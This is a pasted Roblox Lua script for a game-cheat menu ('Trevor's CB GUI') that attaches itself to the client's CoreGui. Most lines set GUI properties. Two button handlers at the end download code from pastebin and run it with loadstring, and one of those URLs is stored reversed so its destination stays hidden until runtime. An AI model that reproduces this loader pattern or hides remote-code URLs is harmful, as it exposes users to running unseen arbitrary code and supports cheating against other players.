Advertisement
Guest User

Untitled

a guest
Oct 20th, 2018
87
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.11 KB | None | 0 0
  1. local CBGui = Instance.new("ScreenGui")
  2. local OpenFrame = Instance.new("Frame")
  3. local Open = Instance.new("TextButton")
  4. local MainFrame = Instance.new("Frame")
  5. local TextBox = Instance.new("TextBox")
  6. local Close = Instance.new("TextButton")
  7. local RD = Instance.new("TextButton")
  8. local Pepsi = Instance.new("TextButton")
  9. --Properties:
  10. CBGui.Name = "CBGui"
  11. CBGui.Parent = game.CoreGui
  12.  
  13. OpenFrame.Name = "OpenFrame"
  14. OpenFrame.Parent = CBGui
  15. OpenFrame.BackgroundColor3 = Color3.new(1, 0.721569, 1)
  16. OpenFrame.BackgroundTransparency = 0.20000000298023
  17. OpenFrame.BorderColor3 = Color3.new(1, 1, 1)
  18. OpenFrame.Position = UDim2.new(0, 0, 0.479166657, 0)
  19. OpenFrame.Size = UDim2.new(0, 67, 0, 20)
  20.  
  21. Open.Name = "Open"
  22. Open.Parent = OpenFrame
  23. Open.BackgroundColor3 = Color3.new(1, 0.721569, 1)
  24. Open.BackgroundTransparency = 0.20000000298023
  25. Open.BorderColor3 = Color3.new(1, 1, 1)
  26. Open.Size = UDim2.new(0, 67, 0, 20)
  27. Open.Font = Enum.Font.SourceSans
  28. Open.Text = "Open"
  29. Open.TextColor3 = Color3.new(1, 1, 1)
  30. Open.TextSize = 14
  31.  
  32. MainFrame.Name = "MainFrame"
  33. MainFrame.Parent = CBGui
  34. MainFrame.BackgroundColor3 = Color3.new(1, 0.721569, 1)
  35. MainFrame.BorderColor3 = Color3.new(1, 1, 1)
  36. MainFrame.Position = UDim2.new(0, 0, 0.390625, 0)
  37. MainFrame.Size = UDim2.new(0, 106, 0, 66)
  38. MainFrame.Visible = false
  39.  
  40. TextBox.Parent = MainFrame
  41. TextBox.BackgroundColor3 = Color3.new(1, 0.721569, 1)
  42. TextBox.BorderColor3 = Color3.new(1, 1, 1)
  43. TextBox.Size = UDim2.new(0, 87, 0, 22)
  44. TextBox.Font = Enum.Font.SourceSans
  45. TextBox.Text = "Trevor's CB GUI"
  46. TextBox.TextColor3 = Color3.new(1, 1, 1)
  47. TextBox.TextSize = 14
  48.  
  49. Close.Name = "Close"
  50. Close.Parent = MainFrame
  51. Close.BackgroundColor3 = Color3.new(1, 0.721569, 1)
  52. Close.BorderColor3 = Color3.new(1, 1, 1)
  53. Close.Position = UDim2.new(0.820754707, 0, 0, 0)
  54. Close.Size = UDim2.new(0, 19, 0, 22)
  55. Close.Font = Enum.Font.SourceSans
  56. Close.Text = "X"
  57. Close.TextColor3 = Color3.new(1, 1, 1)
  58. Close.TextSize = 14
  59.  
  60. RD.Name = "RD"
  61. RD.Parent = MainFrame
  62. RD.BackgroundColor3 = Color3.new(1, 0.721569, 1)
  63. RD.BorderColor3 = Color3.new(1, 1, 1)
  64. RD.Position = UDim2.new(0, 0, 0.326941252, 0)
  65. RD.Size = UDim2.new(0, 106, 0, 22)
  66. RD.Font = Enum.Font.SourceSans
  67. RD.Text = "RD"
  68. RD.TextColor3 = Color3.new(1, 1, 1)
  69. RD.TextSize = 14
  70.  
  71. Pepsi.Name = "Pepsi"
  72. Pepsi.Parent = MainFrame
  73. Pepsi.BackgroundColor3 = Color3.new(1, 0.721569, 1)
  74. Pepsi.BorderColor3 = Color3.new(1, 1, 1)
  75. Pepsi.Position = UDim2.new(0, 0, 0.661221504, 0)
  76. Pepsi.Size = UDim2.new(0, 106, 0, 22)
  77. Pepsi.Font = Enum.Font.SourceSans
  78. Pepsi.Text = "Pepsi"
  79. Pepsi.TextColor3 = Color3.new(1, 1, 1)
  80. Pepsi.TextSize = 14
  81.  
  82. Open.MouseButton1Down:connect(function()
  83. game.CoreGui.CBGui.MainFrame.Visible = true
  84. game.CoreGui.CBGui.OpenFrame.Visible = false
  85. end)
  86.  
  87. Close.MouseButton1Down:connect(function()
  88. game.CoreGui.CBGui.MainFrame.Visible = false
  89. game.CoreGui.CBGui.OpenFrame.Visible = true
  90. end)
  91.  
  92. Pepsi.MouseButton1Click:connect(function()
  93. loadstring(game:HttpGet(([[namVmrTD/war/moc.nibetsap//:sptth]]):reverse(),true))()
  94. end)
  95.  
  96. RD.MouseButton1Click:connect(function()
  97. loadstring(game:HttpGet(('https://pastebin.com/raw/prLJtLa3'),true))()
  98. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement